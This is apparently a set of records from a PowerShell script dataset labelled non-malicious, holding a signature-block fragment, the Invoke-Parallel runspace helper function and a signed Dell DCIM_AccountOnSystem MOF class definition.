2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDVjCCAj4CAQEwggEBoYHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjozNjA1LTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAb28KDG/xXbNB # jmM7/nqw3bgrEOaggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDANBgkqhkiG9w0BAQsFAAIFAOrJsSYwIhgPMjAyNDEwMjgwNjQzNTBaGA8yMDI0 # MTAyOTA2NDM1MFowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6smxJgIBADAHAgEA # AgIPIDAHAgEAAgIT5zAKAgUA6ssCpgIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgor # BgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUA # A4IBAQBaN24RfbEDYuiZzqm7A4pV5f2hpp1MXvQiKNCPCo6auhWTBxhWvoAFA2Yd # uik5ad6IJA7n3eXZZvkfovjXUeUfclz34hSqlUveVGitbm3K9Awqnk2tZGgk9Li0 # GfRa6QSb/KpHS+RGIAeRp0zHfzfqy/SmE6GTQFacpa8KRg7boj/ktDUBq0kkQ578 # OFTecSrudpM+HrP9rwuxbsGhVUoCOEsKOp0WdtzSXBlryAdgyGP1izHSW9Tc92oI # /x2UnsP+/eCeuyNqOYe6VBjwFFzrSlLoVp2/o4gAiafzJbJpD2LXbW7P8MOkaTRN # ky50Lo7MnEMgN3LQB6Hb4jUX9rCAMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAH3WCB1BMr7wvQAAQAAAfcwDQYJYIZIAWUD # BAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0B # CQQxIgQgVWAaKdH2EikJiGPrfxX9z5PQCyVIuXVyQ4IZatka25kwgfoGCyqGSIb3 # DQEJEAIvMYHqMIHnMIHkMIG9BCAh2pjaa3ca0ecYuhu60uYHP/IKnPbedbVQJ5So # IH5Z4jCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB # 91ggdQTK+8L0AAEAAAH3MCIEIGH07306AH18MQdXDVR9dHZ+mbda9Lv03oh+XI/b # gvEVMA0GCSqGSIb3DQEBCwUABIICAFpoh1EYSZAcOTym63UCW667Xep8lXd0VKnu # b/weVcraVCnHoxxhagZ7WKlWn0x2qOtFlq1tWeunfdIMora/13jtjIF7kVXoX4LP # oLsOw4hjtBrjfe29Hq8bLgRk2dhbcoVO5bT7oE9Rhs/b1gB68Eid7hz84iQW5Fdu # nMG9+8VlAnyWA+omF8XVPBqDI0+09e8PB0+uNAs6y8g9/mB4ORKwrem/6j5doZwC # HzxJwUc5JA24wthIsa7aeWT54Kol1jNVl1nYotNTDeTWDZfLBpjjGalVKtCU3m41 # V1hj0AqGr0k8tRjhpG+hty7eo6OmYZ77rKaHMB6njaJgRNUBTWv7P7m1Zz2FC0Nz # XohOUzevfuYUnLP9Wj1FnX/hDA+H7kzWwN1NPNhqYWZeJ4g/8y2U2/pNjZTEWTD3 # wsoqHbexT93dvjvd208i/C/TwMMhO6tcyooV8DwLbyFCzSi0MLLqRgPAkLt6o/v/ # 9Yy5esgODlTv7N7x3/teiHuH9xq7UVovXf4WzOdM+4wEtzWq80YFpd+BY0DpYmGR # 1fnQycGpboCfZInSsFNYrb01w72nIzv2py9E1cmRCSox4M9+mg2G22xiedDm/l1Y # GUSkmve8AOp8GH3AiPLQhaZCVbPgbv79G5iDgr5jGAdNduZF1slhNRrd0leXZi72 # 1eXY+XbV # SIG # End signature block
combined_dataset/train/non-malicious/3200.ps1
3200.ps1
function Invoke-Parallel { [cmdletbinding(DefaultParameterSetName='ScriptBlock')] Param ( [Parameter(Mandatory=$false,position=0,ParameterSetName='ScriptBlock')] [System.Management.Automation.ScriptBlock]$ScriptBlock, [Parameter(Mandatory=$false,ParameterSetName='ScriptFile')] [ValidateScript({Test-Path $_ -pathtype leaf})] $ScriptFile, [Parameter(Mandatory=$true,ValueFromPipeline=$true)] [Alias('CN','__Server','IPAddress','Server','ComputerName')] [PSObject]$InputObject, [PSObject]$Parameter, [switch]$ImportVariables, [switch]$ImportModules, [switch]$ImportFunctions, [int]$Throttle = 20, [int]$SleepTimer = 200, [int]$RunspaceTimeout = 0, [switch]$NoCloseOnTimeout = $false, [int]$MaxQueue, [validatescript({Test-Path (Split-Path $_ -parent)})] [switch] $AppendLog = $false, [string]$LogFile, [switch] $Quiet = $false ) begin { if( -not $PSBoundParameters.ContainsKey('MaxQueue') ) { if($RunspaceTimeout -ne 0){ $script:MaxQueue = $Throttle } else{ $script:MaxQueue = $Throttle * 3 } } else { $script:MaxQueue = $MaxQueue } $ProgressId = Get-Random Write-Verbose "Throttle: '$throttle' SleepTimer '$sleepTimer' runSpaceTimeout '$runspaceTimeout' maxQueue '$maxQueue' logFile '$logFile'" if ($ImportVariables -or $ImportModules -or $ImportFunctions) { $StandardUserEnv = [powershell]::Create().addscript({ $Modules = Get-Module | Select-Object -ExpandProperty Name $Snapins = Get-PSSnapin | Select-Object -ExpandProperty Name $Functions = Get-ChildItem function:\ | Select-Object -ExpandProperty Name $Variables = Get-Variable | Select-Object -ExpandProperty Name @{ Variables = $Variables Modules = $Modules Snapins = $Snapins Functions = $Functions } }).invoke()[0] if ($ImportVariables) { Function _temp {[cmdletbinding(SupportsShouldProcess=$True)] param() } $VariablesToExclude = @( (Get-Command _temp | Select-Object -ExpandProperty parameters).Keys + $PSBoundParameters.Keys + $StandardUserEnv.Variables ) Write-Verbose "Excluding variables $( ($VariablesToExclude | Sort-Object ) -join ", ")" $UserVariables = @( Get-Variable | Where-Object { -not ($VariablesToExclude -contains $_.Name) } ) Write-Verbose "Found variables to import: $( ($UserVariables | Select-Object -expandproperty Name | Sort-Object ) -join ", " | Out-String).`n" } if ($ImportModules) { $UserModules = @( Get-Module | Where-Object {$StandardUserEnv.Modules -notcontains $_.Name -and (Test-Path $_.Path -ErrorAction SilentlyContinue)} | Select-Object -ExpandProperty Path ) $UserSnapins = @( Get-PSSnapin | Select-Object -ExpandProperty Name | Where-Object {$StandardUserEnv.Snapins -notcontains $_ } ) } if($ImportFunctions) { $UserFunctions = @( Get-ChildItem function:\ | Where-Object { $StandardUserEnv.Functions -notcontains $_.Name } ) } } Function Get-RunspaceData { [cmdletbinding()] param( [switch]$Wait ) Do { $more = $false if (-not $Quiet) { Write-Progress -Id $ProgressId -Activity "Running Query" -Status "Starting threads"` -CurrentOperation "$startedCount threads defined - $totalCount input objects - $script:completedCount input objects processed"` -PercentComplete $( Try { $script:completedCount / $totalCount * 100 } Catch {0} ) } Foreach($runspace in $runspaces) { $currentdate = Get-Date $runtime = $currentdate - $runspace.startTime $runMin = [math]::Round( $runtime.totalminutes ,2 ) $log = "" | Select-Object Date, Action, Runtime, Status, Details $log.Action = "Removing:'$($runspace.object)'" $log.Date = $currentdate $log.Runtime = "$runMin minutes" If ($runspace.Runspace.isCompleted) { $script:completedCount++ if($runspace.powershell.Streams.Error.Count -gt 0) { $log.status = "CompletedWithErrors" Write-Verbose ($log | ConvertTo-Csv -Delimiter ";" -NoTypeInformation)[1] foreach($ErrorRecord in $runspace.powershell.Streams.Error) { Write-Error -ErrorRecord $ErrorRecord } } else { $log.status = "Completed" Write-Verbose ($log | ConvertTo-Csv -Delimiter ";" -NoTypeInformation)[1] } $runspace.powershell.EndInvoke($runspace.Runspace) $runspace.powershell.dispose() $runspace.Runspace = $null $runspace.powershell = $null } ElseIf ( $runspaceTimeout -ne 0 -and $runtime.totalseconds -gt $runspaceTimeout) { $script:completedCount++ $timedOutTasks = $true $log.status = "TimedOut" Write-Verbose ($log | ConvertTo-Csv -Delimiter ";" -NoTypeInformation)[1] Write-Error "Runspace timed out at $($runtime.totalseconds) seconds for the object:`n$($runspace.object | out-string)" if (!$noCloseOnTimeout) { $runspace.powershell.dispose() } $runspace.Runspace = $null $runspace.powershell = $null $completedCount++ } ElseIf ($runspace.Runspace -ne $null ) { $log = $null $more = $true } if($logFile -and $log) { ($log | ConvertTo-Csv -Delimiter ";" -NoTypeInformation)[1] | out-file $LogFile -append } } $temphash = $runspaces.clone() $temphash | Where-Object { $_.runspace -eq $Null } | ForEach-Object { $Runspaces.remove($_) } if($PSBoundParameters['Wait']){ Start-Sleep -milliseconds $SleepTimer } } while ($more -and $PSBoundParameters['Wait']) } if($PSCmdlet.ParameterSetName -eq 'ScriptFile') { $ScriptBlock = [scriptblock]::Create( $(Get-Content $ScriptFile | out-string) ) } elseif($PSCmdlet.ParameterSetName -eq 'ScriptBlock') { [string[]]$ParamsToAdd = '$_' if( $PSBoundParameters.ContainsKey('Parameter') ) { $ParamsToAdd += '$Parameter' } $UsingVariableData = $Null if($PSVersionTable.PSVersion.Major -gt 2) { $UsingVariables = $ScriptBlock.ast.FindAll({$args[0] -is [System.Management.Automation.Language.UsingExpressionAst]},$True) If ($UsingVariables) { $List = New-Object 'System.Collections.Generic.List`1[System.Management.Automation.Language.VariableExpressionAst]' ForEach ($Ast in $UsingVariables) { [void]$list.Add($Ast.SubExpression) } $UsingVar = $UsingVariables | Group-Object -Property SubExpression | ForEach-Object {$_.Group | Select-Object -First 1} $UsingVariableData = ForEach ($Var in $UsingVar) { try { $Value = Get-Variable -Name $Var.SubExpression.VariablePath.UserPath -ErrorAction Stop [pscustomobject]@{ Name = $Var.SubExpression.Extent.Text Value = $Value.Value NewName = ('$__using_{0}' -f $Var.SubExpression.VariablePath.UserPath) NewVarName = ('__using_{0}' -f $Var.SubExpression.VariablePath.UserPath) } } catch { Write-Error "$($Var.SubExpression.Extent.Text) is not a valid Using: variable!" } } $ParamsToAdd += $UsingVariableData | Select-Object -ExpandProperty NewName -Unique $NewParams = $UsingVariableData.NewName -join ', ' $Tuple = [Tuple]::Create($list, $NewParams) $bindingFlags = [Reflection.BindingFlags]"Default,NonPublic,Instance" $GetWithInputHandlingForInvokeCommandImpl = ($ScriptBlock.ast.gettype().GetMethod('GetWithInputHandlingForInvokeCommandImpl',$bindingFlags)) $StringScriptBlock = $GetWithInputHandlingForInvokeCommandImpl.Invoke($ScriptBlock.ast,@($Tuple)) $ScriptBlock = [scriptblock]::Create($StringScriptBlock) Write-Verbose $StringScriptBlock } } $ScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock("param($($ParamsToAdd -Join ", "))`r`n" + $Scriptblock.ToString()) } else { Throw "Must provide ScriptBlock or ScriptFile"; Break } Write-Debug "`$ScriptBlock: $($ScriptBlock | Out-String)" Write-Verbose "Creating runspace pool and session states" $sessionstate = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault() if($ImportVariables -and $UserVariables.count -gt 0) { foreach($Variable in $UserVariables) { $sessionstate.Variables.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Variable.Name, $Variable.Value, $null) ) } } if ($ImportModules) { if($UserModules.count -gt 0) { foreach($ModulePath in $UserModules) { $sessionstate.ImportPSModule($ModulePath) } } if($UserSnapins.count -gt 0) { foreach($PSSnapin in $UserSnapins) { [void]$sessionstate.ImportPSSnapIn($PSSnapin, [ref]$null) } } } if($ImportFunctions -and $UserFunctions.count -gt 0) { foreach ($FunctionDef in $UserFunctions) { $sessionstate.Commands.Add((New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList $FunctionDef.Name,$FunctionDef.ScriptBlock)) } } $runspacepool = [runspacefactory]::CreateRunspacePool(1, $Throttle, $sessionstate, $Host) $runspacepool.Open() Write-Verbose "Creating empty collection to hold runspace jobs" $Script:runspaces = New-Object System.Collections.ArrayList $bound = $PSBoundParameters.keys -contains "InputObject" if(-not $bound) { [System.Collections.ArrayList]$allObjects = @() } if( $LogFile -and (-not (Test-Path $LogFile) -or $AppendLog -eq $false)){ New-Item -ItemType file -Path $logFile -Force | Out-Null ("" | Select-Object -Property Date, Action, Runtime, Status, Details | ConvertTo-Csv -NoTypeInformation -Delimiter ";")[0] | Out-File $LogFile } $log = "" | Select-Object -Property Date, Action, Runtime, Status, Details $log.Date = Get-Date $log.Action = "Batch processing started" $log.Runtime = $null $log.Status = "Started" $log.Details = $null if($logFile) { ($log | convertto-csv -Delimiter ";" -NoTypeInformation)[1] | Out-File $LogFile -Append } $timedOutTasks = $false } process { if($bound) { $allObjects = $InputObject } else { [void]$allObjects.add( $InputObject ) } } end { try { $totalCount = $allObjects.count $script:completedCount = 0 $startedCount = 0 foreach($object in $allObjects) { $powershell = [powershell]::Create() if ($VerbosePreference -eq 'Continue') { [void]$PowerShell.AddScript({$VerbosePreference = 'Continue'}) } [void]$PowerShell.AddScript($ScriptBlock).AddArgument($object) if ($parameter) { [void]$PowerShell.AddArgument($parameter) } if ($UsingVariableData) { Foreach($UsingVariable in $UsingVariableData) { Write-Verbose "Adding $($UsingVariable.Name) with value: $($UsingVariable.Value)" [void]$PowerShell.AddArgument($UsingVariable.Value) } } $powershell.RunspacePool = $runspacepool $temp = "" | Select-Object PowerShell, StartTime, object, Runspace $temp.PowerShell = $powershell $temp.StartTime = Get-Date $temp.object = $object $temp.Runspace = $powershell.BeginInvoke() $startedCount++ Write-Verbose ( "Adding {0} to collection at {1}" -f $temp.object, $temp.starttime.tostring() ) $runspaces.Add($temp) | Out-Null Get-RunspaceData $firstRun = $true while ($runspaces.count -ge $Script:MaxQueue) { if($firstRun) { Write-Verbose "$($runspaces.count) items running - exceeded $Script:MaxQueue limit." } $firstRun = $false Get-RunspaceData Start-Sleep -Milliseconds $sleepTimer } } Write-Verbose ( "Finish processing the remaining runspace jobs: {0}" -f ( @($runspaces | Where-Object {$_.Runspace -ne $Null}).Count) ) Get-RunspaceData -wait if (-not $quiet) { Write-Progress -Id $ProgressId -Activity "Running Query" -Status "Starting threads" -Completed } } finally { if ( ($timedOutTasks -eq $false) -or ( ($timedOutTasks -eq $true) -and ($noCloseOnTimeout -eq $false) ) ) { Write-Verbose "Closing the runspace pool" $runspacepool.close() } [gc]::Collect() } } }
combined_dataset/train/non-malicious/sample_6_39.ps1
sample_6_39.ps1
// Copyright (c) 2016 Dell Inc. or its subsidiaries. All Rights Reserved. // ================================================================== // DCIM_AccountOnSystem // ================================================================== [dynamic, provider("dcismprovider"), Association, Description ( "DCIM_AccountOnSystem is a derivation of CIM_AccountOnSystem." "A system aggregates Accounts and scopes the uniqueness of " "the Account names." ) ] class DCIM_AccountOnSystem : CIM_AccountOnSystem { [ Aggregate, Description ("The aggregating system also provides name scoping for the Account."), Max (1), Min (1), Override ("GroupComponent"), Required ] CIM_System REF GroupComponent; [ Description ("The subordinate Account."), Override ("PartComponent"), Required, Weak ] CIM_Account REF PartComponent; }; /* SIG # Begin signature block */ /* MIItDQYJKoZIhvcNAQcCoIIs/jCCLPoCAQExDzANBglghkgBZQMEAgEFADB5Bgor */ /* BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG */ /* KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDy8cgvq6t48j2y */ /* rCPIyeDyttiZY6Cc1GkEB2TUndiX5KCCEmMwggXfMIIEx6ADAgECAhBOQOQ3VO3m */ /* jAAAAABR05R/MA0GCSqGSIb3DQEBCwUAMIG+MQswCQYDVQQGEwJVUzEWMBQGA1UE */ /* ChMNRW50cnVzdCwgSW5jLjEoMCYGA1UECxMfU2VlIHd3dy5lbnRydXN0Lm5ldC9s */ /* ZWdhbC10ZXJtczE5MDcGA1UECxMwKGMpIDIwMDkgRW50cnVzdCwgSW5jLiAtIGZv */ /* ciBhdXRob3JpemVkIHVzZSBvbmx5MTIwMAYDVQQDEylFbnRydXN0IFJvb3QgQ2Vy */ /* dGlmaWNhdGlvbiBBdXRob3JpdHkgLSBHMjAeFw0yMTA1MDcxNTQzNDVaFw0zMDEx */ /* MDcxNjEzNDVaMGkxCzAJBgNVBAYTAlVTMRYwFAYDVQQKDA1FbnRydXN0LCBJbmMu */ /* MUIwQAYDVQQDDDlFbnRydXN0IENvZGUgU2lnbmluZyBSb290IENlcnRpZmljYXRp */ /* b24gQXV0aG9yaXR5IC0gQ1NCUjEwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK */ /* AoICAQCngY/3FEW2YkPy2K7TJV5IT1G/xX2fUBw10dZ+YSqUGW0nRqSmGl33VFFq */ /* gCLGqGZ1TVSDyV5oG6v2W2Swra0gvVTvRmttAudFrnX2joq5Mi6LuHccUk15iF+l */ /* OhjJUCyXJy2/2gB9Y3/vMuxGh2Pbmp/DWiE2e/mb1cqgbnIs/OHxnnBNCFYVb5Cr */ /* +0i6udfBgniFZS5/tcnA4hS3NxFBBuKK4Kj25X62eAUBw2DtTwdBLgoTSeOQm3/d */ /* vfqsv2RR0VybtPVc51z/O5uloBrXfQmywrf/bhy8yH3m6Sv8crMU6UpVEoScRCV1 */ /* HfYq8E+lID1oJethl3wP5bY9867DwRG8G47M4EcwXkIAhnHjWKwGymUfe5SmS1dn */ /* DH5erXhnW1XjXuvH2OxMbobL89z4n4eqclgSD32m+PhCOTs8LOQyTUmM4OEAwjig */ /* nPqEPkHcblauxhpb9GdoBQHNG7+uh7ydU/Yu6LZr5JnexU+HWKjSZR7IH9Vybu5Z */ /* HFc7CXKd18q3kMbNe0WSkUIDTH0/yvKquMIOhvMQn0YupGaGaFpoGHApOBGAYGuK */ /* Q6NzbOOzazf/5p1nAZKG3y9I0ftQYNVc/iHTAUJj/u9wtBfAj6ju08FLXxLq/f0u */ /* DodEYOOp9MIYo+P9zgyEIg3zp3jak/PbOM+5LzPG/wc8Xr5F0wIDAQABo4IBKzCC */ /* AScwDgYDVR0PAQH/BAQDAgGGMBIGA1UdEwEB/wQIMAYBAf8CAQEwHQYDVR0lBBYw */ /* FAYIKwYBBQUHAwMGCCsGAQUFBwMIMDsGA1UdIAQ0MDIwMAYEVR0gADAoMCYGCCsG */ /* AQUFBwIBFhpodHRwOi8vd3d3LmVudHJ1c3QubmV0L3JwYTAzBggrBgEFBQcBAQQn */ /* MCUwIwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLmVudHJ1c3QubmV0MDAGA1UdHwQp */ /* MCcwJaAjoCGGH2h0dHA6Ly9jcmwuZW50cnVzdC5uZXQvZzJjYS5jcmwwHQYDVR0O */ /* BBYEFIK61j2Xzp/PceiSN6/9s7VpNVfPMB8GA1UdIwQYMBaAFGpyJnrQHu995ztp */ /* UdRsjZ+QEmarMA0GCSqGSIb3DQEBCwUAA4IBAQAfXkEEtoNwJFMsVXMdZTrA7LR7 */ /* BJheWTgTCaRZlEJeUL9PbG4lIJCTWEAN9Rm0Yu4kXsIBWBUCHRAJb6jU+5J+Nzg+ */ /* LxR9jx1DNmSzZhNfFMylcfdbIUvGl77clfxwfREc0yHd0CQ5KcX+Chqlz3t57jpv */ /* 3ty/6RHdFoMI0yyNf02oFHkvBWFSOOtg8xRofcuyiq3AlFzkJg4sit1Gw87kVlHF */ /* VuOFuE2bRXKLB/GK+0m4X9HyloFdaVIk8Qgj0tYjD+uL136LwZNr+vFie1jpUJuX */ /* bheIDeHGQ5jXgWG2hZ1H7LGerj8gO0Od2KIc4NR8CMKvdgb4YmZ6tvf6yK81MIIG */ /* CDCCA/CgAwIBAgIQBu9mzEaGqLK0hNoZKy1rYTANBgkqhkiG9w0BAQ0FADBPMQsw */ /* CQYDVQQGEwJVUzEWMBQGA1UEChMNRW50cnVzdCwgSW5jLjEoMCYGA1UEAxMfRW50 */ /* cnVzdCBDb2RlIFNpZ25pbmcgQ0EgLSBPVkNTMjAeFw0yNDA0MTkwOTE2MDlaFw0y */ /* NTA1MTIwOTE2MDhaMIGEMQswCQYDVQQGEwJVUzEOMAwGA1UECBMFVGV4YXMxEzAR */ /* BgNVBAcTClJvdW5kIFJvY2sxEjAQBgNVBAoTCURlbGwgSW5jLjEoMCYGA1UECxMf */ /* U2VydmVyIFN5c3RlbXMgTWdtdCBFbmdpbmVlcmluZzESMBAGA1UEAxMJRGVsbCBJ */ /* bmMuMIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAvFatHoJS1lbvBD4U */ /* x/jt6hrhOHlGpntV/TPJbKwAdvG6SCT6MfdFasEGShyzypfx8adv3v+sFWo84yYB */ /* GqnqH/Kkj48BTKNREXjN3x/jLZrv+rVRQJYG79us7u3vQVSBX0ds0Jcd9f7u2REE */ /* aLBKrd7ZwxmsHoiAaqKYBm8nMo4kmH4xOw6cOXxUW6mkYxNQxn60nxV5A2ZJvUKn */ /* YvanuULo5jGrl+t2A5jInOLyxSmNU62DdLbyhtE3B6cEhe5yQ54hi7d6c5IM2fNH */ /* FNrQkRavAWUyAxPPBpTSsR0g/IkNymbNPCTjgvDQOIJBcMp0C+q158RIBiE+IMwq */ /* QGi7aUvUUhzTQG9NcSDQan3hMmYfevU3RLQMw4OcoGIT/jOSYmgtcLHiB6lnOG/h */ /* iJ8EsQgW1s2yJ7vG2Fo/IHvQjbfFxefO+gluw4UjcLZgIqACIlFNYGaq4rzKtTeF */ /* 1NNy6DjjbJV2nt/JlD68YlFg0pU9rGDKglZFWvfWiLId8IJnAgMBAAGjggEoMIIB */ /* JDAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRFrXrMchlvXUnwqKV0rQOPRSgzqzAf */ /* BgNVHSMEGDAWgBTvn7p5sHPyJR54nANSnBtThN6N7TBnBggrBgEFBQcBAQRbMFkw */ /* IwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLmVudHJ1c3QubmV0MDIGCCsGAQUFBzAC */ /* hiZodHRwOi8vYWlhLmVudHJ1c3QubmV0L292Y3MyLWNoYWluLnA3YzAxBgNVHR8E */ /* KjAoMCagJKAihiBodHRwOi8vY3JsLmVudHJ1c3QubmV0L292Y3MyLmNybDAOBgNV */ /* HQ8BAf8EBAMCB4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwEwYDVR0gBAwwCjAIBgZn */ /* gQwBBAEwDQYJKoZIhvcNAQENBQADggIBACoeAWs2aV9gf+TF4AGOKc454/E55mVR */ /* Yz42M1ksqASl2j+ulObFIWcuy/paLjWhMSulehEA8Zb+YQ89fR6Y0TgJ0Eh09aK5 */ /* +GARB7q/+a+gRIw7nfrwmjMkXAwL+9lmbc1X64fEUuKY2NVdksjKC7xRKNMb5i50 */ /* NQyVN9neCJKIVSQDiBMXGgtDkAqPe1sH7/NGGQZKCXhIg3f3caq7dr/mZoiVAIOB */ /* XtHr++65DqG61aWyZV5tCfzSvXFvLpL0dbu14gH6gEo5Zvlp226Vk+HKr/cQ2Ynj */ /* /xXw/5UWHvmKwDOAkA/ld64jA4m466aoP2tKse8z1kSa/zw1wRSp0bwPn23gj2IO */ /* NmEG9dM9Lv3c5FH+oBKNuqJ2Vj5viCHVZEcw40UDQqdfboVK+Y1XSkNfa1CUjzCu */ /* Q2J3XMrfVK9ZCecopoCAXzYem7e/G/Md3rTQky2PTf7Z1hgYlqxisPoGEV3nguIg */ /* ooMbBkHbl/4iWAB237woZFlX0imdO5se7el67/nx58CSLYjNmj82Y4cthnFOrwP4 */ /* mUW7zVXlq9sZP9fCcrdrNMUF4KYS2x7/IIgHURKvOTjyT6f+ZRedEfwOlM1D12/l */ /* eL1OX+dPZq5BGGHal3r1xbLdLxHUlMg+IJJk0wmMwmSF3kzbqbMUTaM1FX9x0+E8 */ /* 4YVlsJB1ttLHMIIGcDCCBFigAwIBAgIQce9VdK81VMNaLGn2b0trzTANBgkqhkiG */ /* 9w0BAQ0FADBpMQswCQYDVQQGEwJVUzEWMBQGA1UECgwNRW50cnVzdCwgSW5jLjFC */ /* MEAGA1UEAww5RW50cnVzdCBDb2RlIFNpZ25pbmcgUm9vdCBDZXJ0aWZpY2F0aW9u */ /* IEF1dGhvcml0eSAtIENTQlIxMB4XDTIxMDUwNzE5MjA0NVoXDTQwMTIyOTIzNTkw */ /* MFowTzELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKDAmBgNV */ /* BAMTH0VudHJ1c3QgQ29kZSBTaWduaW5nIENBIC0gT1ZDUzIwggIiMA0GCSqGSIb3 */ /* DQEBAQUAA4ICDwAwggIKAoICAQCemXYXGp5WFwhjLJNNg2GEMzQCttlioN7CDrkg */ /* TMhXnQ/dVFsNDNYB3S9I4ZEJ4dvIFQSCtnvw2NYwOxlxcPuoppf2KV2kDKn0Uz5X */ /* 2wxObvx2218k6apfQ+OT5w7PyiW8xEwwC1oP5gb05W4MmWZYT4NhwnN8XCJvAUXF */ /* D/dAT2RL0BcKqQ4eAi+hj0zyZ1DbPuSfwk8/dOsxpNCU0Jm8MJIJasskzaLYdlLQ */ /* TnWYT2Ra0l6D9FjAXWp1xNg/ZDqLFA3YduHquWvnEXBJEThjE27xxvq9EEU1B+Z2 */ /* FdB1FqrCQ1f+q/5jc0YioLjz5MdwRgn5qTdBmrNLbB9wcqMH9jWSdBFkbvkC1cCS */ /* lfGXWX4N7qIl8nFVuJuNv83urt37DOeuMk5QjaHf0XO/wc5/ddqrv9CtgjjF54jt */ /* om06hhG317DhqIs7DEEXml/kW5jInQCf93PSw+mfBYd5IYPWC+3RzAif4PHFyVi6 */ /* U1/Uh7GLWajSXs1p0D76xDkJr7S17ec8+iKH1nP5F5Vqwxz1VXhf1PoLwFs/jHgV */ /* DlpMOm7lJpjQJ8wg38CGO3qNZUZ+2WFeqfSuPtT8r0XHOrOFBEqLyAlds3sCKFnj */ /* hn2AolhAZmLgOFWDq58pQSa6u+nYZPi2uyhzzRVK155z42ZMsVGdgSOLyIZ3srYs */ /* NyJwIQIDAQABo4IBLDCCASgwEgYDVR0TAQH/BAgwBgEB/wIBADAdBgNVHQ4EFgQU */ /* 75+6ebBz8iUeeJwDUpwbU4Teje0wHwYDVR0jBBgwFoAUgrrWPZfOn89x6JI3r/2z */ /* tWk1V88wMwYIKwYBBQUHAQEEJzAlMCMGCCsGAQUFBzABhhdodHRwOi8vb2NzcC5l */ /* bnRydXN0Lm5ldDAxBgNVHR8EKjAoMCagJKAihiBodHRwOi8vY3JsLmVudHJ1c3Qu */ /* bmV0L2NzYnIxLmNybDAOBgNVHQ8BAf8EBAMCAYYwEwYDVR0lBAwwCgYIKwYBBQUH */ /* AwMwRQYDVR0gBD4wPDAwBgRVHSAAMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly93d3cu */ /* ZW50cnVzdC5uZXQvcnBhMAgGBmeBDAEEATANBgkqhkiG9w0BAQ0FAAOCAgEAXvOG */ /* mTXBee7wEK/XkkPShdBb4Jig4HFRyRTLUJpgDrAEJkmxz+m6mwih2kNd1G8jorn4 */ /* QMdH/k0BC0iQP8jcarQ+UzUovkBKR4VqHndAzIB/YbQ8T3mo5qOmoH5EhnG/EhuV */ /* gXL3DaXQ3mefxqK48Wr5/P50ZsZk5nk9agNhTksfzCBiywIY7GPtfnE/lroLXmgi */ /* Z+wfwNIFFmaxsqTq/MWVo40SpfWN7xsgzZn35zLzWXEf3ZTmeeVSIxBWKvxZOL+/ */ /* eSWSasf9q2d3cbEEfTWtFME+qPwjF1YIGHzXeiJrkWrMNUVtTzudQ50FuJ3z/DQh */ /* XAQYMlc4NMHKgyNGpogjIcZ+FICrse+7C6wJP+5TkTGz4lREqrV9MDwsI5zoP6NY */ /* 6kAIF6MgX3rADNuq/wMWAw10ZCKalF4wNXYT9dPh4+AHytnqRYhGnFTVEOLzMglA */ /* tudcFzL+zK/rbc9gPHXz7lxgQFUbtVmvciNoTZx0BAwQya9QW6cNZg+W5ZqV4CCi */ /* GtCw7jhJnipnnpGWbJjbxBBtYHwebkjntn6vMwcSce+9lTu+qYPUQn23pzTXX4aR */ /* ta9WWNpVfRe927zNZEEVjTFRBk+0LrKLPZzzTeNYA1TMrIj4UjxOS0YJJRn/Feen */ /* mEYufbrq4+N8//m5GZW+drkNebICURpKyJ+IwkMxghoAMIIZ/AIBATBjME8xCzAJ */ /* BgNVBAYTAlVTMRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMSgwJgYDVQQDEx9FbnRy */ /* dXN0IENvZGUgU2lnbmluZyBDQSAtIE9WQ1MyAhAG72bMRoaosrSE2hkrLWthMA0G */ /* 